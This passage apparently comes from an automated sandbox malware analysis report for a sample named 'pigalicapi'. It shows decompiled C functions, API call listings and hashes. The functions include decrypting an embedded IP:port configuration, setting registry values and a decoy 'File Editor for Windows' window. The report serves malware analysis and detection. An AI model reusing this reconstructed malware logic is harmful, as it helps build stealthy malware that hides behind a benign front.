                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8B0C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 024E8B37
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 024E8B5E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 024E8B7A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B87
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B91
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8B9D
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 024E7A4B
                                                                                                                                                                                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 024E7A90
                                                                                                                                                                                                                                                                                                        • wnsprintfA.SHLWAPI ref: 024E7ABC
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %s:%u$Hogerfazwafx
                                                                                                                                                                                                                                                                                                        • API String ID: 1891311255-1052426064
                                                                                                                                                                                                                                                                                                        • Opcode ID: a8bd464f4d936ea84497b4a3b5090fc0ccf57da3e861e1b2947b34a05145dab3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 54b18a4f2b3e33a05ee1f4151fd5a213940033f57bc27f37367b4d6c6db071af
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8bd464f4d936ea84497b4a3b5090fc0ccf57da3e861e1b2947b34a05145dab3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25410DB1E40208EBEF04DF94CD85BEEBBB5EB48705F14815AE6067B281D7759A40CF64
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E5E30(signed char _a4) {
                                                                                                                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                                                                                                                        				char _v9;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				char* _v24;
                                                                                                                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                                                                                                                        				signed int _v29;
                                                                                                                                                                                                                                                                                                        				int _v36;
                                                                                                                                                                                                                                                                                                        				char _v68;
                                                                                                                                                                                                                                                                                                        				int _v72;
                                                                                                                                                                                                                                                                                                        				char* _t31;
                                                                                                                                                                                                                                                                                                        				long _t33;
                                                                                                                                                                                                                                                                                                        				long _t37;
                                                                                                                                                                                                                                                                                                        				char* _t45;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v9 = 0;
                                                                                                                                                                                                                                                                                                        				_t31 =  *0x24f18a0; // 0x24f3b88
                                                                                                                                                                                                                                                                                                        				_v8 = _t31;
                                                                                                                                                                                                                                                                                                        				_t45 =  *0x24f1894; // 0x24f3fc4
                                                                                                                                                                                                                                                                                                        				_v24 = _t45;
                                                                                                                                                                                                                                                                                                        				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                                        				if(( *0x24f435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                                                                                                                        				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                                                        				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                                        					_v36 = 0x20;
                                                                                                                                                                                                                                                                                                        					_v28 = 0x20;
                                                                                                                                                                                                                                                                                                        					_v29 = 0;
                                                                                                                                                                                                                                                                                                        					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
                                                                                                                                                                                                                                                                                                        					if(_t37 == 0 && _v28 == 0x10) {
                                                                                                                                                                                                                                                                                                        						_v29 = 1;
                                                                                                                                                                                                                                                                                                        						if((_a4 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        							RegDeleteValueA(_v20, _v24);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t48 = _v29 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					if((_v29 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						_v72 = 0x10;
                                                                                                                                                                                                                                                                                                        						E024E9BD0(_t48,  &_v68, 0x10);
                                                                                                                                                                                                                                                                                                        						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10);
                                                                                                                                                                                                                                                                                                        						_v9 = 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v9;
                                                                                                                                                                                                                                                                                                        			}

















                                                                                                                                                                                                                                                                                                        0x024e5e36
                                                                                                                                                                                                                                                                                                        0x024e5e3a
                                                                                                                                                                                                                                                                                                        0x024e5e3f
                                                                                                                                                                                                                                                                                                        0x024e5e42
                                                                                                                                                                                                                                                                                                        0x024e5e48
                                                                                                                                                                                                                                                                                                        0x024e5e4b
                                                                                                                                                                                                                                                                                                        0x024e5e5b
                                                                                                                                                                                                                                                                                                        0x024e5e5d
                                                                                                                                                                                                                                                                                                        0x024e5e5d
                                                                                                                                                                                                                                                                                                        0x024e5e64
                                                                                                                                                                                                                                                                                                        0x024e5e7e
                                                                                                                                                                                                                                                                                                        0x024e5e86
                                                                                                                                                                                                                                                                                                        0x024e5e8c
                                                                                                                                                                                                                                                                                                        0x024e5e93
                                                                                                                                                                                                                                                                                                        0x024e5e9a
                                                                                                                                                                                                                                                                                                        0x024e5eb2
                                                                                                                                                                                                                                                                                                        0x024e5eba
                                                                                                                                                                                                                                                                                                        0x024e5ec2
                                                                                                                                                                                                                                                                                                        0x024e5ecc
                                                                                                                                                                                                                                                                                                        0x024e5ed6
                                                                                                                                                                                                                                                                                                        0x024e5ed6
                                                                                                                                                                                                                                                                                                        0x024e5ecc
                                                                                                                                                                                                                                                                                                        0x024e5edc
                                                                                                                                                                                                                                                                                                        0x024e5ee2
                                                                                                                                                                                                                                                                                                        0x024e5ee4
                                                                                                                                                                                                                                                                                                        0x024e5ef1
                                                                                                                                                                                                                                                                                                        0x024e5f0b
                                                                                                                                                                                                                                                                                                        0x024e5f11
                                                                                                                                                                                                                                                                                                        0x024e5f11
                                                                                                                                                                                                                                                                                                        0x024e5f19
                                                                                                                                                                                                                                                                                                        0x024e5f19
                                                                                                                                                                                                                                                                                                        0x024e5f25

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 024E5E7E
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 024E5EB2
                                                                                                                                                                                                                                                                                                        • RegDeleteValueA.ADVAPI32(00000000,?), ref: 024E5ED6
                                                                                                                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 024E5F0B
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 024E5F19
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                                                                                        • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                                                                        • Opcode ID: a662877f9cdc3c9e1b4ab369a60465522b854d15ce0f607cce53da906f2af05e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 29330670a24967ac740748ae2846134ddc2b1297197f7d0006a45393c2433b00
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a662877f9cdc3c9e1b4ab369a60465522b854d15ce0f607cce53da906f2af05e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2315070E40209EBEF04DFE4D895BBFBBB9AB44709F14444DEA05AB281D7B55610CBA1
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                                        			E024E4AC0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                                        					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                                                                                                                        						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
                                                                                                                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                                                                                                                        							Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						EnterCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                                                                                                                                                        						_t31 = E024E8250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                                                                        						_t50 = _t50 + 0x10;
                                                                                                                                                                                                                                                                                                        						_v16 = _t31;
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                                                        						if(_v16 <= 0) {
                                                                                                                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						E024E62B0(_v20, _v16); // executed
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        						SetEvent( *(_v8 + 0x24));
                                                                                                                                                                                                                                                                                                        						__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L8:
                                                                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                                                                        0x024e4ac9
                                                                                                                                                                                                                                                                                                        0x024e4ad0
                                                                                                                                                                                                                                                                                                        0x024e4ad8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e4ade
                                                                                                                                                                                                                                                                                                        0x024e4ae5
                                                                                                                                                                                                                                                                                                        0x024e4b80
                                                                                                                                                                                                                                                                                                        0x024e4b85
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e4b85
                                                                                                                                                                                                                                                                                                        0x024e4b08
                                                                                                                                                                                                                                                                                                        0x024e4b0e
                                                                                                                                                                                                                                                                                                        0x024e4b15
                                                                                                                                                                                                                                                                                                        0x024e4b32
                                                                                                                                                                                                                                                                                                        0x024e4b37
                                                                                                                                                                                                                                                                                                        0x024e4b3a
                                                                                                                                                                                                                                                                                                        0x024e4b44
                                                                                                                                                                                                                                                                                                        0x024e4b4e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e4b58
                                                                                                                                                                                                                                                                                                        0x024e4b6b
                                                                                                                                                                                                                                                                                                        0x024e4b78
                                                                                                                                                                                                                                                                                                        0x024e4b90
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e4b90
                                                                                                                                                                                                                                                                                                        0x024e4ade
                                                                                                                                                                                                                                                                                                        0x024e4b96
                                                                                                                                                                                                                                                                                                        0x024e4b9b

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 024E4AD8
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064), ref: 024E4AF4
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(-0000000C), ref: 024E4B08
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(-0000000C), ref: 024E4B44
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E4B6B
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 024E4B78
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001388), ref: 024E4B85
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 024E4B90
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3462651527-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 13fe20db4617c71ba9b31debdfcad7de3c316911b593f31a6cde0f80840fe585
                                                                                                                                                                                                                                                                                                        • Instruction ID: c7711dc9cd757cf12494a0aaaad94669e6dbc768ac01e749c188a80846d24f2d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13fe20db4617c71ba9b31debdfcad7de3c316911b593f31a6cde0f80840fe585
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41215E75D40208EFEB04DBD4D988FAEB7B9EB48302F108949E506AB241C735DA50CF90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E00401A9C(struct HWND__* _a4, int _a8, signed int _a12, signed int _a16) {
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                                                                                                                        				struct HMENU__* _v64;
                                                                                                                                                                                                                                                                                                        				int _t52;
                                                                                                                                                                                                                                                                                                        				int _t53;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _t59;
                                                                                                                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                                                                                                                        				signed int _t92;
                                                                                                                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t52 = _a8;
                                                                                                                                                                                                                                                                                                        				if(_t52 == 5) {
                                                                                                                                                                                                                                                                                                        					if(_a12 != 1) {
                                                                                                                                                                                                                                                                                                        						_t59 = GetDlgItem(_a4, 0x3e9);
                                                                                                                                                                                                                                                                                                        						_v48 = 1;
                                                                                                                                                                                                                                                                                                        						_v52 = _a16 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        						_v56 = _a16 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        						_v60 = 0;
                                                                                                                                                                                                                                                                                                        						_v64 = 0;
                                                                                                                                                                                                                                                                                                        						 *(_t100 - 8) = _t59;
                                                                                                                                                                                                                                                                                                        						MoveWindow(??, ??, ??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L29;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					if(_t52 > 5) {
                                                                                                                                                                                                                                                                                                        						if(_t52 == 0x10) {
                                                                                                                                                                                                                                                                                                        							DestroyWindow(_a4);
                                                                                                                                                                                                                                                                                                        							goto L29;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							if(_t52 == 0x111) {
                                                                                                                                                                                                                                                                                                        								_t66 = _a12 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        								if(_t66 == 0x236e) {
                                                                                                                                                                                                                                                                                                        									E00401879(_a4, 0);
                                                                                                                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									if(_t66 > 0x236e) {
                                                                                                                                                                                                                                                                                                        										if(_t66 == 0x236f) {
                                                                                                                                                                                                                                                                                                        											PostMessageA(_a4, 0x10, 0, 0);
                                                                                                                                                                                                                                                                                                        											goto L25;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											if(_t66 == 0x2370) {
                                                                                                                                                                                                                                                                                                        												E00401879(_a4, 1);
                                                                                                                                                                                                                                                                                                        												goto L25;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										if(_t66 == 0x236d) {
                                                                                                                                                                                                                                                                                                        											MessageBoxA(0, "File Editor for Windows!\nCreated using the Win32 API", "About...", 0);
                                                                                                                                                                                                                                                                                                        											L25:
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								goto L29;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								if(_t52 == 7) {
                                                                                                                                                                                                                                                                                                        									 *(_t100 - 8) = GetDlgItem(_a4, 0x3e9);
                                                                                                                                                                                                                                                                                                        									SetFocus(??);
                                                                                                                                                                                                                                                                                                        									goto L29;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									goto L28;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						if(_t52 == 1) {
                                                                                                                                                                                                                                                                                                        							CreateWindowExA(0, "EDIT", 0x41f060, 0x50301004, 0x80000000, 0x80000000, 0x80000000, 0x80000000, _a4, 0x3e9, GetModuleHandleA(0), 0); // executed
                                                                                                                                                                                                                                                                                                        							_t92 = GetStockObject(0x11);
                                                                                                                                                                                                                                                                                                        							_v52 = 1;
                                                                                                                                                                                                                                                                                                        							_v56 = _t92;
                                                                                                                                                                                                                                                                                                        							_v60 = 0x30;
                                                                                                                                                                                                                                                                                                        							_v64 = 0x3e9;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t100 - 0xffffffffffffffd0)) = _a4;
                                                                                                                                                                                                                                                                                                        							SendDlgItemMessageA(??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                                                                        							goto L29;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							if(_t52 == 2) {
                                                                                                                                                                                                                                                                                                        								PostQuitMessage(0);
                                                                                                                                                                                                                                                                                                        								L29:
                                                                                                                                                                                                                                                                                                        								_t53 = 0;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                                                                                                                        								_t53 = DefWindowProcA(_a4, _a8, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t53;
                                                                                                                                                                                                                                                                                                        			}






















                                                                                                                                                                                                                                                                                                        0x00401aa4
                                                                                                                                                                                                                                                                                                        0x00401aaa
                                                                                                                                                                                                                                                                                                        0x00401ba5
                                                                                                                                                                                                                                                                                                        0x00401bc9
                                                                                                                                                                                                                                                                                                        0x00401bce
                                                                                                                                                                                                                                                                                                        0x00401bd6
                                                                                                                                                                                                                                                                                                        0x00401bda
                                                                                                                                                                                                                                                                                                        0x00401bde
                                                                                                                                                                                                                                                                                                        0x00401be6
                                                                                                                                                                                                                                                                                                        0x00401bee
                                                                                                                                                                                                                                                                                                        0x00401bf6
                                                                                                                                                                                                                                                                                                        0x00401bf8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401ab0
                                                                                                                                                                                                                                                                                                        0x00401ab3
                                                                                                                                                                                                                                                                                                        0x00401acb
                                                                                                                                                                                                                                                                                                        0x00401ce8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401ad1
                                                                                                                                                                                                                                                                                                        0x00401ad6
                                                                                                                                                                                                                                                                                                        0x00401c2d
                                                                                                                                                                                                                                                                                                        0x00401c35
                                                                                                                                                                                                                                                                                                        0x00401c6b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401c37
                                                                                                                                                                                                                                                                                                        0x00401c3c
                                                                                                                                                                                                                                                                                                        0x00401c4f
                                                                                                                                                                                                                                                                                                        0x00401caa
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401c51
                                                                                                                                                                                                                                                                                                        0x00401c56
                                                                                                                                                                                                                                                                                                        0x00401c80
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401c58
                                                                                                                                                                                                                                                                                                        0x00401c56
                                                                                                                                                                                                                                                                                                        0x00401c3e
                                                                                                                                                                                                                                                                                                        0x00401c43
                                                                                                                                                                                                                                                                                                        0x00401cd5
                                                                                                                                                                                                                                                                                                        0x00401cdb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401c45
                                                                                                                                                                                                                                                                                                        0x00401c43
                                                                                                                                                                                                                                                                                                        0x00401c3c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401adc
                                                                                                                                                                                                                                                                                                        0x00401adf
                                                                                                                                                                                                                                                                                                        0x00401c18
                                                                                                                                                                                                                                                                                                        0x00401c20
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401ae5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401ae5
                                                                                                                                                                                                                                                                                                        0x00401adf
                                                                                                                                                                                                                                                                                                        0x00401ad6
                                                                                                                                                                                                                                                                                                        0x00401ab5
                                                                                                                                                                                                                                                                                                        0x00401ab8
                                                                                                                                                                                                                                                                                                        0x00401b5a
                                                                                                                                                                                                                                                                                                        0x00401b6b
                                                                                                                                                                                                                                                                                                        0x00401b70
                                                                                                                                                                                                                                                                                                        0x00401b78
                                                                                                                                                                                                                                                                                                        0x00401b7c
                                                                                                                                                                                                                                                                                                        0x00401b84
                                                                                                                                                                                                                                                                                                        0x00401b8f
                                                                                                                                                                                                                                                                                                        0x00401b97
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401aba
                                                                                                                                                                                                                                                                                                        0x00401abd
                                                                                                                                                                                                                                                                                                        0x00401cfb
                                                                                                                                                                                                                                                                                                        0x00401d29
                                                                                                                                                                                                                                                                                                        0x00401d29
                                                                                                                                                                                                                                                                                                        0x00401ac3
                                                                                                                                                                                                                                                                                                        0x00401d02
                                                                                                                                                                                                                                                                                                        0x00401d22
                                                                                                                                                                                                                                                                                                        0x00401d24
                                                                                                                                                                                                                                                                                                        0x00401abd
                                                                                                                                                                                                                                                                                                        0x00401ab8
                                                                                                                                                                                                                                                                                                        0x00401ab3
                                                                                                                                                                                                                                                                                                        0x00401d34

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateItemMessageSendWindow
                                                                                                                                                                                                                                                                                                        • String ID: 0$About...$EDIT$File Editor for Windows!Created using the Win32 API
